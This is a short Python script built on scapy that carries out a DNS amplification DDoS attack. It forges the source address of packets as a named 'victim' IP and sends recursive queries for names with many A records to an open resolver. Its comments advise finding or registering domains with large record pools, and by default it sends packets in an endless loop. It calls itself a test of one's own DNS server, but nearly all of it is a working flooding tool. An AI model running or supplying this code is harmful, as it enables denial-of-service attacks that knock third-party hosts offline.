#!/usr/bin/env python3

import argparse
from random import choice

from scapy.all import *

# Populate this list with domain names with lots of A records.
# IRC server DNS pools are a good place to look.
# Maybe get a cheap throwaway domain and add your own A records.
names = ['irc.efnet.net', 'irc.dal.net', 'irc.undernet.org', 'irc.freenode.net']

parser = argparse.ArgumentParser(add_help=True,
    description='Test your DNS server against amplification DDoS Attack')

parser.add_argument('-i', help='interface name', default=get_working_if())
parser.add_argument('-v', help='IP address of the victim')
parser.add_argument('-t', help='IP address of the misconfigured DNS')
parser.add_argument('-c', help='count of packets to sent')

args = parser.parse_args()

if os.getuid() != 0:
    print('Must be superuser.')
    sys.exit(1)

if not args.v:
    print("-v (the ip address of the victim) must be specified")
    sys.exit(2)

if not args.t:
    print("-t (the ip address of the misconfigured DNS) must be specified")
    sys.exit(3)

pkt = IP(dst=args.t,src=args.v)/UDP(dport=53)/DNS(rd=1,
        qd=DNSQR(qname=choice(names)))

if args.c:
    send(pkt, count=int(args.c), iface=args.i, verbose=1)
else:
    send(pkt, loop=1, iface=args.i, verbose=1)

# vim:sw=4:ts=4:sts=4:et:cc=80
# End of file
